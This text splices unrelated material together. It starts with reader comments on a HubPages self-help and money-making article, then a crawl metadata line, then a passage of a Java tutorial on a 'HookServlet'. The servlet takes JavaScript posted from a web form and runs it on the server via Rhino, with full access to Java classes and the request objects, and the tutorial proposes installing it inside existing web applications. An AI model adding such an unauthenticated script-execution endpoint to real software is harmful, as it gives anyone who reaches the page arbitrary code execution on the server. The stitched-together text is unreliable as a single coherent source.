Thank you so much Satori. Your article is helpful and truthful. However, I just wanted to ask you for some help, if you can. Also, everybody who reads my comments is more than welcome to give me their opinions. I know I like to help people, and I know I can help them through my writings, songs and speeches. Life has taught me lessons that would be valuable to other people. I have learned a lot through fairy tales that my family taught me when I was young, and I am sure they are unknown to the public. However, I have no idea on how to make money on them because I do not know who would like them. I thought about putting all my short stories together and trying to make them published as a book, but the idea was overwhelming for me. So, I did some researches and submitted one part of my fairy tale story on this web. It was rated 68 and I even do not know what that means. Do you have more information on how this web works? What could I do make money on this website. I have many kinds of short stories to submit, but I do not know if it is the right thing to do. I am doing some researches right know and trusting God to guide me exactly when he needs me in his work, and I have hope.
Thank you so much,
Vera
Satori, I have to spend some time looking at this great hub again, and again. You gave some powerful points. hat your talking about , you will be seeing more of me if that's OK, I have a habit of sticking with the winners. Here is a little motivator tell me what you think. I am sure the readers will relate.....
Peace, Love, Health, Happiness and Massive Success ...JosephDiego
Nice hub from a nice bloke.
Thanks Satori, I agree with your thoughts on life generally. We need to help if we can, and we can all help. Some of the best things in life may not be free, but they feel free when they come from a free heart.
This is the second hub of yours that I have read and now I know that I will be reading more. Thumbs up!
you just make someone day great
I salute your ability to sift out useful info and get your readers thinking. You are an excellent writer. I need help with the website building, I can learn and build one but I want to take time out to do that in the future.Right now I need a website to call my own and do one or two stuffs in. So do help me and let me know how u can help me make payment for the 110mb account as I do not reside in the US. Thanks
Nicely written. I agree with your principles. Great hub.
Cool hub!!!
Nice work. Thanks for sharing..
14 | http://hubpages.com/money/How-to-Create-Excellent-Money-Making-Plans | CC-MAIN-2016-40 | refinedweb | 4,559 | 79.3 |
CAN Interface for USB with PCAN, Software and Demo
This article is a tutorial on accessing the PEAK-System PCAN-USB CAN interface from C# code. The PEAK-System PCAN-USB adapter is an established product that comes with drivers and example code. That code was the inspiration for a C# software library to allow for quick integration into a .NET project. A download of the library to interface to the PCAN-USB adaptor is provided, along with a demo program.
A Brief Introduction to CAN
The Controller Area Network (CAN) is a digital data bus used to transfer sensor readings and actuator values between computers and microcontrollers in many types of systems. It was invented by Bosch for use in cars but is now used in other transport systems, buildings and factory automation. Its popularity is due to its simplicity (just two wires), lowcost and reliability. The data speed is low by todays standards, commonly up to one megabit per second (1 Mb/s). Five hundred kilo bits per second (500 kb/s) is often seen in vehicles. For long cable lengths low speeds are required (less than 125 kb/s). For links to detailed resources on the CAN protocol, and information on CAN bus wiring see the article CAN Bus Wiring Diagram, a Basics Tutorial.
The PEAK-System hardware CAN interface, the software that PEAK provides, and the library provided here, means that a .NET app is easily connected to a CAN bus. Whilst lower cost USB to CAN interfaces are available, the support from PEAK and the performance of their products means they are widely used.
The PEAK-System PCAN-USB Interface Wiring
The PCAN adaptor comes with a standard USB connection for attaching to a laptop or desktop computer. The connection to CAN is via a 9-way D-type plug. The pinouts match the common CiA 303-1 specification. See the CAN Bus Wiring Diagram article. Note, some single board computers and Arduino CAN adapters do not follow the usual CiA CAN wiring. If using the PEAK USB adapter on some of those devices, check the device information to ensure correct wiring. The PCAN-USB manual available from the PEAK-System support page contains information on the PCAN-USB D-type connector. For basic CAN operation the CAN high, pin 7, and CAN low, pin 2 are connected together.
A CAN data bus requires a termination resistor at each end to absorb signal energy. This prevents the signal from reflecting back along the two wires an interfering with subsequent data transmissions. The termination resistance is typically 120 ohms. The PEAK-System PCAN-USB manual has details on enabling the termination internally in the PCAN-USB device.
The PEAK-System PCAN Software
The software for use to verify PCAN-USB devices are working and performing basic CAN traffic capturing, viewing and analysis functions. (Copy PcanView.exe from the pcanview.zip download.)
- A variety of Application Programming Interaces (APIs), in the form of Windows DLLs, are available (e.g. XCP, ISO-TP, UDS, etc.). The starting point (as used in the software provided here) is the PCAN-Basic API, accessed via PCANBasic.dll which can be installed with the drivers, or download the pcan-basic.zip.
The Peak-System PCAN-USB sample for C# is a WinForms program. Therefore, it shows how to add PCAN-USB support to a C# project. To simplify the process a DLL project has been developed that can be dropped into a .NET solution. The PCAN-USB interface is then accessed via a C# class. This makes the PCAN-USB device immmediately available for use in a new project.
A PEAK-System PCAN-USB Library and Demo
Note: Please consider the software as beta. It is your responsibility ensure that the software will not cause you any issues.
The C# class to interface with PCAN-USB is available from GitHub, in the project called PCAN_for_USB. If you don't want to clone the project () then it can be downloaded from here as a zip file, or via the GitHub zip file link.
Once the zip file is extracted, or the project cloned, the demo program can be tried. However, it will require the PEAK-System PCAN-USB drivers to be installed, along with the PCANBasic.dll (see above). Another CAN device will be required to form a CAN network. It you have two PCAN-USB devices they can be used to talk to each other.
The Visual Studio solution file is PCAN_For_USB.sln. Open the solution, it should build and run when the Start/Run button is pressed.
PCAN-USB Interface Software Demo UI
The PCAN-USB interface C# class comes with a demo program. The Windows Forms (WinForms) UI demo is called PCAN_USB_UI. If a PEAK-USB hardware adaptor is not plugged into the computer the message Plug in a PEAK PCAN USB Adapter will be displayed. To use the demo program:
- Select the PCAN-USB device from the list of detected devices.
- Select the correct or required baud rate.
- Click the Start button.
- A standard eight byte message can be transmitted, and received messages are displayed.
The code for the UI demo should be easy enough to understand, and helps to see how the PCAN_USB class is used.
Reusing the PCAN_USB Class
To reuse the PCAN_USB class add the project to a new solution (or add a reference to the compiled DLL). For example copy the PCAN_USB project to the new solution folder. (It is good practice to change the ProjectGuid.) In Microsoft Visual Studio add the PCAN_USB project to the solution using the Add and Existing Project menu options. Add the reference to PCAN_USB in the project that will using the PCAN_USB class.
The class to interface to the PCAN-USB adaptor is called PCAN_USB, in the CAN.PC namespace:
using System.Windows.Forms; using CAN.PC; namespace MyCANProject { public partial class Form1 : Form { PCAN_USB pCAN; public Form1() { InitializeComponent(); //Layer between C# program and PEAK interface DLL pCAN = new PCAN_USB(this); } } }
The plugged in PCAN-USB devices are return with the GetUSBDevices() method:
private void Form1_Load(object sender, EventArgs e) { List<string> PeakUSBDevices = pCAN.GetUSBDevices(); if (PeakUSBDevices != null) listBox1.Items.AddRange(PeakUSBDevices.ToArray()); }
Possible baud rates are provided in a string array:
listBox2.Items.AddRange(PCAN_USB.CANBaudRates);
The PEAK-System API uses an unsigned short integer to reference a PCAN-USB device, use DecodePEAKHandle to extract it from the string displayed in the list.
UInt16 handle = 0; //PCAN handles are ushorts if (listBox1.SelectedIndex > -1) handle = pCAN.DecodePEAKHandle(listBox1.Items[listBox1.SelectedIndex].ToString());
Use WriteFrame to send a CAN message:
private void button2_Click(object sender, EventArgs e) { //Data buffer is a fixed size, here 8 bytes for standard CAN //Number of bytes sent determined by a data length code (DLC) byte[] data = new byte[8]; //Set an id (0 to 2047 for standard CAN) UInt32 id = 0x7ff; //Set the number of bytes to send, here 3 bytes int length = 3; // Set the data data[0] = 0x01; data[1] = 0x02; data[2] = 0x03; //Send a three byte message pCAN.WriteFrame(id, length, data); }
A PCAN_USB class stores the data from a received CAN packet:
public class Packet { //PEAK uses a struct for passing to the PEAK dll public ulong Microseconds { set; get; } public uint Id { set; get; } public byte Length { set; get; } public byte[] Data { set; get; } //Index for displaying in list boxes public int DisplayIndex { get; set; } = -1; }
Received CAN packets are stored in a PCAN_USB list:
public List<Packet> Packets { get; set; } = new List<Packet>();
Use the usual Count for a List to get the number of packets in the buffer:
label2.Text = pCAN.Packets.Count.ToString();
Received packets overwrite the last one with the same id, unless it is turned off:
//Don't overwrite received packets pCAN.OverwriteLastPacket = false;
A list box can be updated automatically as packets are received. Note: This feature has not been optimized for performance.
//Update a list box as packets are received pCAN.ReceivedMessages = listBox3;
When finished with a PCAN-USB adaptor call Uninitialize().
private void Form1_FormClosing(object sender, FormClosingEventArgs e) { //Close any open channels pCAN.Uninitialize(); }
See Also
- CAN Bus Wiring Diagram, a Basics Tutorial
- PCAN-USB devices loopback test
- For a full list of the articles on Tek Eye see the full site Index
Author:Daniel S. Fowler Published: | http://tekeye.uk/automotive/can-interface-for-usb-with-pcan | CC-MAIN-2018-26 | refinedweb | 1,389 | 63.39 |
while loop
Executes a statement repeatedly, until the value of expression becomes equal to zero. The test takes place before each iteration.
[edit] Syntax
[edit] Explanation
A
while statement causes the statement (also called the loop body) to be executed repeatedly until the expression (also called controlling expression) compares equal to zero. The repetition occurs regardless of whether the loop body is entered normally or by a goto into the middle of statement.
The evaluation of expression takes place before each execution of statement (unless entered by a goto). If the controlling expression needs to be evaluated after the loop body, the do-while loop may be used.
If the execution of the loop needs to be terminated at some point, break statement can be used as;
while(true) is always an endless loop.
[edit] Notes
Boolean and pointer expressions are often used as loop controlling expressions. The boolean value
false and the null pointer value of any pointer type compare equal to zero.
[edit] Keywords
[edit] Example
#include <stdio.h> #include <stdlib.h> #include <string.h> enum { SIZE = 8 }; int main(void) { // trivial example int array[SIZE], n = 0; while(n < SIZE) array[n++] = rand() % 2; puts("Array filled!"); n = 0; while(n < SIZE) printf("%d ", array[n++]); printf("\n"); // classic strcpy() implementation // (copies a null-terminated string from src to dst) char src[]="Hello, world", dst[sizeof src], *p=dst, *q=src; while(*p++ = *q++) ; // null statement puts(dst); }
Output:
Array filled! 1 0 1 1 1 1 0 0 Hello, world | https://en.cppreference.com/w/c/language/while | CC-MAIN-2020-05 | refinedweb | 254 | 55.74 |
You are viewing revision #4 of this wiki article.
This version may not be up to date with the latest version.
You may want to view the differences to the latest version or see the changes made in this revision.
« previous (#3)next (#5) »
This tutorial presents a way of separating JS code from views and passing to it values from PHP.
Yii provides two helpful ways of keeping JavaScript code close to the widgets and other elements they interact with:
- strings prefixed with 'js:'
- CClientScript.registerScript method
Quickly, small snippets of JavaScript code turn into big ugly strings filled with PHP variables and without proper syntax highlighting.
This tutorial shows a method of organizing JavaScript code and integrating it with a PHP backend.
jQuery plugin template ¶
This template for building JavaScript plugins is proposed by jQuery:
(function( yourPluginName, $, undefined ) { // public method yourPluginName.someCallback = function() { }; }( window.yourPluginName = window.yourPluginName || {}, jQuery ));
This defines a function that is immediately called and passed two arguments:
- a reference to window.yourPluginName
- the jQuery object
This allows you to extend the global yourPluginName object by adding methods and properties to it, keeping them all in one scope.
Now you can place your bulky JS code from your views inside this plugin and use them as: this plugin you keep them in a limited scope and thus create a namespace for it. That helps avoiding name conflicts and keeps your code cleaner.
Another important feature is that this plugin can be registered many times. Sometimes this can happen when you load an action through AJAX on a page that has already registered the script.
This also allows extending if further, adding more functions.
Also, since there actually is a limited scope, strict mode can be enabled:
:
(function( yourPluginName, $, undefined ) { // guard to detect browser-specific issues early in development "use strict"; // private var var _settings; // public var yourPluginName.someProperty = 'default value'; // public method yourPluginName);
The '_settings' var is private and can be only referenced inside functions defined in yourPluginName;. | https://www.yiiframework.com/wiki/560/clean-javascript-code-in-your-views?revision=4 | CC-MAIN-2019-26 | refinedweb | 332 | 53.21 |
On Thu, Aug 15, 2002 at 07:11:05AM -0500 I heard the voice of dmk, and lo! it spake thus: > > Is anybody successfully using the port emulators/rtc with vmware2 on > -current? [...]
Advertising
Replying to myself... I have since hacked rtc so it works with vmware2 on my -CURRENT system dated February 4, 2002. In the shocking case that anyone is interested, I have attached the diff. (I would appreciate anybody looking at the diff as it is my first kernel hack.) > Thanks loads, dan
--- rtc.c.bk Thu Aug 15 03:50:21 2002 +++ rtc.c Thu Aug 15 03:51:30 2002 @@ -177,9 +177,8 @@ rtc_open(dev_t dev, int oflag, int otyp, struct proc *p) #endif { - struct rtc_softc *sc; + struct rtc_softc *sc = (struct rtc_softc *) dev->si_drv1; - sc = rtc_attach(dev); if (sc==NULL) return (EAGAIN); @@ -264,7 +263,21 @@ static int init_module(void) { -int error; + int error; + struct rtc_softc *sc; + dev_t dev; + + dev = make_dev(&rtc_cdevsw, 0, UID_ROOT, GID_WHEEL, 0600, DEVICE_NAME); + if(dev==NULL) + return (NULL); + + MALLOC(sc, struct rtc_softc*, sizeof(*sc), M_DEVBUF, M_WAITOK); + if(sc==NULL) + return NULL; + + bzero(sc, sizeof(*sc)); + rtc_sc = sc; + dev->si_drv1 = sc; /* Link together */ error = cdevsw_add(&rtc_cdevsw); if (error) | https://www.mail-archive.com/[email protected]/msg41914.html | CC-MAIN-2018-13 | refinedweb | 197 | 61.06 |
#include <VrmlData_IndexedLineSet.hxx>
Data type to store a set of polygons.
Empty constructor.
Constructor.
Query the array of color indice
Create a copy of this node. If the parameter is null, a new copied node is created. Otherwise new node is not created, but rather the given one is modified.
Reimplemented from VrmlData_Node.
Query the Colors.
Query the Coordinates.
Query a color for one node in the given element. The color is interpreted according to fields myColors, myArrColorInd, myColorPerVertex, as defined in VRML 2.0.
Returns True if the node is default, so that it should not be written.
Reimplemented from VrmlData_Node.
Query one polygon.
Query the array of polygons
Read the Node from input stream.
Implements VrmlData_Node.
Set the colors array of indice
Set the boolean value "colorPerVertex"
Set the Color node
Set the nodes
Set the polygons
Query the shape. This method checks the flag myIsModified; if True it should rebuild the shape presentation.
Implements VrmlData_Geometry.
Write the Node to output stream.
Reimplemented from VrmlData_Node. | https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_vrml_data___indexed_line_set.html | CC-MAIN-2022-33 | refinedweb | 167 | 61.63 |
NAME
kproc_start, kproc_shutdown, kthread_create, kthread_exit, kthread_resume, kthread_suspend, kthread_suspend_check - kernel threads
SYNOPSIS
#include <sys/kthread.h> void kproc_start(const void *udata); void kproc_shutdown(void *arg, int howto); int kthread_create(void (*func)(void *), void *arg, struct proc **newpp, int flags, int pages, const char *fmt, ...); void kthread_exit(int ecode); int kthread_resume(struct proc *p); int kthread_suspend(struct proc *p, int timo); void kthread_suspend_check(struct proc *p);
DESCRIPTION threadthread_create() function is used to create a kernel thread. The new thread shares its address space with process 0, the swapper process, and runs in kernel mode only. The func argument specifies the function that the thread thread’s stack in pages. If 0 is used, the default kernel stack size is allocated. The rest of the arguments form a printf(9) argument list that is used to build the name of the new thread and is stored in the p_comm member of the new thread’s struct proc. The kthread_exit() function is used to terminate kernel threads. It should be called by the main function of the kernel thread rather than letting the main function return to its caller. The ecode argument specifies the exit status of the thread. While exiting, the function exit1(9) will initiate a call to wakeup(9) on the thread handle. The kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions are used to suspend and resume a kernel thread. During the main loop of its execution, a kernel thread that wishes to allow itself to be suspended should call kthread_suspend_check() passing in curproc as the only argument. This function checks to see if the kernel thread has been asked to suspend. If it has, it will tsleep(9) until it is told to resume. Once it has been told to resume it will return allowing execution of the kernel thread to continue. The other two functions are used to notify a kernel thread of a suspend or resume request. The p argument points to the struct proc of the kernel thread to suspend or resume. For kthread_suspend(), the timo argument specifies a timeout to wait for the kernel thread to acknowledge the suspend request and suspend itself. The kproc_create(), kthread_resume(), and kthread_suspend() functions return zero on success and non-zero on failure.
EXAMPLES
This example demonstrates the use of a struct kproc_desc and the functions kproc_start(), kproc_shutdown(), and kthreadthread_suspend_check(bufdaemonproc); ... } }
ERRORS
The kthread_resume() and kthread_suspend() functions will fail if: [EINVAL] The p argument does not reference a kernel thread. The kthread), SYSINIT(9), wakeup(9)
HISTORY
The kproc_start() function first appeared in FreeBSD 2.2. The kproc_shutdown(), kthread_create(), kthread_exit(), kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions were introduced in FreeBSD 4.0. Prior to FreeBSD 5.0, the kproc_shutdown(), kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions were named shutdown_kproc(), resume_kproc(), shutdown_kproc(), and kproc_suspend_loop(), respectively. | http://manpages.ubuntu.com/manpages/intrepid/man9/kproc_start.9freebsd.html | CC-MAIN-2013-20 | refinedweb | 458 | 54.52 |
On Thursday 04 June 2009 05:01:49 pm Peter Robinson wrote: > >> Can someone suggest how I should do this? I'm not sure who put this in > >> my spec file! > >> > >> # for eggs > >> %if 0%{?fedora} >= 8 > >> BuildRequires: python-setuptools-devel > >> %else > >> BuildRequires: python-setuptools > >> %endif > >> > >> Is it safe to drop the conditional now and always expect > >> python-setup-devel to be there? > > > > If you're not building for EPEL 4/5, yes. > > Do EPEL pick up the fedora >= 8 conditional? > > Peter epel defines a %{rhel} macro to 4 or 5 when rhel6 comes whenever that is hopefully it will have defined in redhat-release the macros defineing %{rhel} = 6 probably a better way to do the above example is %if 0%{?fedora} <= 8 || 0%{?rhel} <= 5 BuildRequires: python-setuptools %else BuildRequires: python-setuptools-devel %endif that way if the macros are not defined the newer package is required not the older way. Dennis
Attachment:
signature.asc
Description: This is a digitally signed message part. | https://www.redhat.com/archives/fedora-devel-list/2009-June/msg00376.html | CC-MAIN-2015-22 | refinedweb | 165 | 57.87 |
Simple Kubernetes setup with Traefik 2.0.0 and DOK8s
Stepan Vrany
・7 min read
Literally a few hours ago Containous has released a beta release of awesome Traefik edge proxy. Let's try to deploy an easy setup on DigitalOcean's mananaged Kubernetes platform DOK8s.
Big changes in the ingress specification
First of all I'd like to summarize the most visible change: ingress routes are no longer being specified by the Ingress resource. Instead, there's a set of new CRDs which you can use to precisely set the behaviour of your ingress routes.
So in the version 2 you don't have to put all the advanced configuration into the object annotations which is conclusively a good step forward. Great job!
Let's start with the base infrastructure
I don't want to waste time making screenshots. This is not the way how we should treat a modern infrastructure. Instead I've prepared super easy Terraform manifest which creates all the components in like 5 minutes.
There's also one super positive aspect of infrastructure as a code principle - you can destroy or create it whenever you want. It's extremely useful for playground environments when you really don't want to pay vast amount of 💵 💵 💵
Enough talking. This is the infrastructure "recipe"
resource "digitalocean_tag" "kubernetes-cl01" { name = "kubernetes-cl01" } resource "digitalocean_kubernetes_cluster" "cl01" { name = "cl01" region = "fra1" version = "1.14.4-do.0" node_pool { name = "default" size = "s-2vcpu-2gb" node_count = 3 tags = ["${digitalocean_tag.kubernetes-cl01.id}"] } } resource "digitalocean_certificate" "stepanvrany-cz" { name = "le-stepanvrany-cz" type = "lets_encrypt" domains = ["admin.stepanvrany.cz", "stepanvrany.cz"] } resource "digitalocean_loadbalancer" "kubernetes-cl01-public" { name = "kubernetes-cl01-public" region = "fra1" enable_proxy_protocol = false redirect_http_to_https = true forwarding_rule { entry_port = 80 entry_protocol = "http" target_port = 30101 target_protocol = "http" } forwarding_rule { entry_port = 443 entry_protocol = "http2" target_port = 30101 target_protocol = "http" certificate_id = "${digitalocean_certificate.stepanvrany-cz.id}" } healthcheck { port = 30103 protocol = "http" path = "/ping" } droplet_tag = "${digitalocean_tag.kubernetes-cl01.id}" } resource "digitalocean_firewall" "kubernetes-cl01-public" { name = "kubernetes-cl01-public" tags = ["${digitalocean_tag.kubernetes-cl01.id}"] inbound_rule { protocol = "tcp" port_range = "30101" source_load_balancer_uids = ["${digitalocean_loadbalancer.kubernetes-cl01-public.id}"] } } resource "digitalocean_record" "admin-stepanvrany-cz" { domain = "${data.digitalocean_domain.stepanvrany-cz.name}" type = "A" name = "admin" value = "${digitalocean_loadbalancer.kubernetes-cl01-public.ip}" }
and this is how the "recipe" comes true:
export TF_VAR_do_token=<your DO token> terraform init terraform plan terraform apply -auto-approve
See the full example in my GitHub repository.
Attention: In the example I'm using my custom domain
stepanvrany.cz. This repository is not intended to be plug&play solution so it won't work when you run it without further adjustment.
Kubernetes preparation works
Now we need to install Traefik edge router to our Kubernetes cluster. As I've stated before, Traefik's behavior is no longer managed via Ingress objects but via CRDs so it's a good time to create them. --- apiVersion: v1 kind: ServiceAccount metadata: namespace: default name: traefik-ingress-controller
kubectl apply -f kubernetes/traefik/traefik-prereqs.yaml
Alongside with CRDs we've also deployed another required components such as
ClusterRoleBinding,
ClusterRole and
ServiceAccount. As we are basically extending base Kubernetes functionality, this is a must - Traefik needs some level of access to the Kubernetes API.
Now we can deploy Traefik itself. And this it the reason why we deployed some communication/security rules before. Traefik is basically just a common Deployment which communicates with the Kubernetes API and adjusts its configuration on the fly to match your requirements defined in the custom Kubernetes objects.
This
Let's go through some configuration flags. This Traefik instance will have only one entrypoint for plain HTTP traffic as the TLS termination is done in the DigitalOcean Load Balancer. It listens on port :8000 and we've also configured it to accept all forwarded headers. There's also
--ping part which enables
/ping endpoint we've configured as the Health Check on the Load Balancer.
Such insecure configuration will be just fine in the private testing/development infrastructure but overall it's not a good idea. Please bear that in mind.
As you can see, it also has API enabled (on the default port 8080) so that's why we have two entries in the
ports property - we want to access API or web interface from the outer world.
That's actually a good coincidence that I've just talked about the outer world. It's a good time to think about accessing Traefik from the already configured Load Balancer. In this certain scenario, the most effective way is to use NodePort method. That's why I pre-configured Load Balancer to forward all traffic to TCP port
30101. This port belongs to the dedicated NodePort range so it was perfectly fine to chose one port and configure it on both sides.
This means that when we deploy NodePort service with statically configured NodePort - Load Balancer will be able to communicate with the Traefik Pods through the each Cluster's node.
And here we go, this is the service:
apiVersion: v1 kind: Service metadata: name: traefik spec: type: NodePort ports: - protocol: TCP name: web port: 8000 nodePort: 30101 - protocol: TCP name: admin port: 8080 nodePort: 30103 selector: app: traefik
Now we can access Traefik's HTTP entrypoint and admin interface on ports
30101 and
30103. Sweet.
Please note that we've put the administration interface there only because we need to access
/pingendpoint from the Load Balancer. The actual administration interface will be exposed to the outer world via IngressRoute resource.
Exposing the administration interface
Oh yeah, we could expose the administration interface directly via Load Balancer but there's no point in doing it like that. Load Balancer does not support all the cool features that Traefik does so let's just expose it as all other future services.(`admin.stepanvrany.cz`) && PathPrefix(`/`) kind: Rule priority: 1 services: - name: traefik-admin port: 8080
In the Service object we're basically exporting the same service as we've exported before under a different name. That's not absolutely necessary but let's do it like that 😂
And finally you can see the custom Traefik resource for the ingress route. It's pretty similar to good old Ingress resource but this is just a tip of the iceberg.
Let's deploy these resources and see what happens.
Oh, that's great! I can access the administration interface from the outer world. But wait, it means that the interface can be accessed by anyone ... that's not the desired state, right?
Middlewares for the win!
Of course it's not the desired state. And here comes the next custom Traefik resource: middleware. By using middlewares we can simply adjust the behaviour of the ingress route. There's a vast of middlewares for all the common situations you can encounter in the real life such as redirects, rewrites or basic auth. And basic auth is the middleware we're gonna use.
apiVersion: traefik.containo.us/v1alpha1 kind: Middleware metadata: name: admin-auth spec: basicAuth: users: - admin:$apr1$1nzs8OB2$po4LalWDMglIs8FzuMsAU0
Basic Auth uses standard htpasswd mechanism so you just need to install apache2 utils and then you can generate as many password hashes as you need.
Now we just need to deploy
admin-auth middleware and adjust the
traefik-admin ingress route object like this:
apiVersion: traefik.containo.us/v1alpha1 kind: IngressRoute metadata: name: traefik-admin spec: entryPoints: - web routes: - match: Host(`admin.stepanvrany.cz`) && PathPrefix(`/`) kind: Rule priority: 1 middlewares: - name: admin-auth services: - name: traefik-admin port: 8080
When we open
admin.stepanvrany.cz we'll be asked for user and password 🎊 Administration interface is (somehow) protected against the rogue users and we can sleep calm. This is the state we were fighting for 😂
Wrap
Compared to the version 1 Traefik 2 is still extremely reliable and superfast edge proxy with a lot of new features (such as TCP load balancing not covered in this post) and rich extensible resources without confusing annotations we know from all other ingress controllers.
To me this is a huge step forward and I'm really looking forward for the final release. Engineers from Containous have done great work and I am very thankful for that!
Any questions? Do not hesitate to leave a comment below. Or you can even reach me out on Twitter!
How did I started learning a new technology
Personnal view of how and why I learned a new technology
Thank you for writing this post! I'm (we're) glad you enjoy the new features :-)
❤️
I'm in love with Traefik and cannot wait to try version 2, thanks for this!
Hi Adrian. I'm head of community for Traefik. Thanks for saying this 👆🏼! Pls join us at our upcoming meetup with Michael Irwin if you'd like: zoom.us/webinar/register/WN_RYmIKU.... And, if you're not yet at the forum, we'd ❤️if you join us there, also! community.containo.us. -- Patricia | https://practicaldev-herokuapp-com.global.ssl.fastly.net/mstrsobserver/simple-kubernetes-setup-with-traefik-2-0-0-and-dok8s-38ep | CC-MAIN-2019-35 | refinedweb | 1,478 | 54.32 |
Extend Client - Auto discovery and re-connectionuser10714864 Feb 1, 2013 3:09 AM
Couple of questions on version 3.7.1 of coherence, we have a scenario where a client is configured with only one proxy server address (let us say A), but we have more than one proxies (B, C and D) running in the cluster (four proxies and 4 cache nodes)..
This content has been marked as final. Show 3 replies
1. Re: Extend Client - Auto discovery and re-connectionBretCalvey Feb 4, 2013 4:21 PM (in response to user10714864)Hi,1 person found this helpful
We use 3.7.1.5 and have extend clients that use CQCs
What we found was that if a connection to a proxy is lost, you have to manually refresh any CQCs that you have set up (when a reconnection happens).
This does not happen magically, you have to deal with this case yourself.
The way to detect when you've lost a connection to the proxy from the client is by registering a "Member Listener" on the client, for example...
public class MyClass implements MemberListener {
@Override
public void memberJoined(MemberEvent event) {
// Called when a connection has been (re-)established
}
@Override
public void memberLeaving(MemberEvent event) {
// Called when proxy is shutting down
}
@Override
public void memberLeft(MemberEvent event) {
// Called when connection is lost
}
}
In our application, if we get a "Member Left" event, we start to return "Service Unavailable" HTTP status codes (this takes the node out of our load balancer - if all our nodes lose the connection, then we are in trouble!!)
We then try and refresh each NamedCache and CQC (by recreating them). When we manage to do this without an error, then we can assume that the connection is OK again and we start processing requests as usual.
Not sure if there is any other way of doing this!
Hope this helps...
2. Re: Extend Client - Auto discovery and re-connectionuser10714864 Feb 10, 2013 10:57 PM (in response to BretCalvey)Thanks for the reply, yes, that's been our observation too.
However, we were trying to test if specifying only one proxy IP in our cache-config xml on the client side, when we have a total of 4 available, and kill the specified proxy and see what happens.
We were expecting the client to connect to the remaining proxies on a subsequent "get/put", it worked, but when we captured the member left event and re-registered our map listeners, the events were coming fine, but they were throwing errors everytime they receive an update/insert event, not sure why the exceptions were being logged, despite everything working otherwise.
We were wondering if this is the expected behavior, or are we missing something?
3. Re: Extend Client - Auto discovery and re-connectionuser123799 Feb 12, 2013 12:18 PM (in response to user10714864)Hi user,
Can you give more details of the exceptions you are seeing? A full coherence log may help clarify things...
Andy | https://community.oracle.com/thread/2495507 | CC-MAIN-2017-17 | refinedweb | 498 | 63.22 |
Dynamic Interaction with Your Web Application
Imagine you are working on a web application. A collection of
servlets, HTML pages, classes, .jars, and other resources is now
shaping into a fully complete application running on a web server.
But something is just not right. Perhaps you are trying to
investigate why certain forms seem to submit correctly but the
database is not updating, or perhaps a generated web page reports
that the server is in a state you would bet it cannot be in. Whatever
the problem, you know you could gather a better understanding if
only you could have access to the running servlet and check the
current state of a few objects. Perhaps you could even temporarily
fix it while you're at it.
In this article I will show you the code of a simple servlet.
This servlet accepts just one attribute via the
POST method. An
equally simple HTML page consisting of a text area and a submit
button is written to interact with it. Yet despite the simplicity
of these two components, what we will have is a powerful tool to
interactively analyze the state of any web application.
Unveiling the Mystery: Introducing the HookServlet
The servlet we want to write needs to be able to hook into any
resource provided by the web server and allow the user to inspect
any part of it. To be able to gather the required information, it
might require flow-control constructs and loops. This leads to one
solution: to make the servlet able to execute a script sent by the
client (i.e., the browser). The script will have not only the
ability to access any server resource, but by manipulating host
objects representing a HTTP request and response, it will be
capable of communicating back to the client.
There are several scripting languages for Java that would be up
to the job, and in this article we will be using "">Rhino. Of course, if you are a
big fan of any of the other many scripting languages for Java, it would
not be too hard to port the servlet to an equivalent implementation
in Jython, Groovy, or similar.
Rhino is a popular open source JavaScript engine written in
Java. Using its API, it is possible with a few lines of code to
create a JavaScript interpreter able to evaluate scripts like
this:
// Script n.1 // printing the current time on the standard output stream java.lang.System.out.println(new java.util.Date()); // script n.2 // writing a log file var FileWriter = Packages.java.io.FileWriter; var fw = new FileWriter("log.txt"); fw.write("hello from rhino"); fw.flush(); fw.close();
Since JavaScript is used so extensively in HTML pages to
manipulate DOM objects, people tend to get confused when it is used
in another environment. However, the language itself is
platform-neutral. The Rhino implementation gains access to any
class by defining two top-level variables named
Packages and
java. The properties of the
variable
Packages are all of the top-level Java packages,
such as
java,
org, and
com.
The variable
java, instead, is just a handy shortcut for
Packages.java.
Let's have a look at how we can integrate the Rhino
engine into our servlet.
import java.io.PrintWriter; import java.io.ByteArrayOutputStream; import java.io.IOException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.mozilla.javascript.Context; import org.mozilla.javascript.Scriptable; import org.mozilla.javascript.EcmaError; public class HookServlet extends HttpServlet { public void doPost(HttpServletRequest httpRequest, HttpServletResponse httpResponse) throws IOException { PrintWriter out=httpResponse.getWriter(); httpResponse.setContentType ("text/html"); httpResponse.setHeader("Cache-Control","no-cache"); String code=httpRequest.getParameter("serverjavascript"); try { Context context= Context.enter(); Scriptable scope=context.initStandardObjects(null); Scriptable jsArgs1=Context.toObject(out, scope); Scriptable jsArgs2=Context.toObject(httpRequest, scope); Scriptable jsArgs3=Context.toObject(httpResponse,scope); scope.put("out", scope,jsArgs1); scope.put("httpRequest", scope,jsArgs2); scope.put("httpResponse",scope,jsArgs3); context.evaluateString(scope, code, "JAVASCRIPT-CODE", 1, null); // flushes and closes the output stream out.flush(); out.close(); } catch(EcmaError e) { ByteArrayOutputStream baos = new ByteArrayOutputStream(); PrintWriter pw = new PrintWriter(baos); e.printStackTrace(pw); pw.flush(); out.println("<html><body><pre>"); out.println("Exception caused by serverside"+ " script execution:\n"); out.println(new String(baos.toByteArray())); out.println("</pre></body></html>".getBytes()); out.flush(); out.close(); } finally { Context.exit(); } } }
The
doPost method is overridden to process the HTML
form posting. In it, the following actions are performed:
- From the
httpRequestobject, we retrieve the
serverjavascriptparameter.
- A Rhino
Contextis initialized.
Contextis an environment for the script to run
in.
- The variables
out,
httpRequest,
and
httpResponseare made available to the script.
- The script is executed.
The exception handling ensures that the stack trace of any
exception caused by the script is passed back to the client.
To interact with the
HookServlet on the client side,
all we have to do is to create an HTML page with a
textarea to host the script, and a button to post it.
Figure 1 shows what it looks like:
Figure 1. The HTML page that interacts with the
HookServlet
Installing the HookServlet
Deploying the
HookServlet in your servlet container
or web server is probably no more work than deploying any other
servlet, and can be easily achieved by packaging the various parts
into a WAR file. However, to use the servlet to interact with your
application, you probably want to install an instance of the
HookServlet into your existing WAR file. In this way,
the
HookServlet will share the same class-loader as
your web application and will have access to the same classes and
resources.
The rules to remember are:
- The client-side files (the HTML file hookpage.html and the
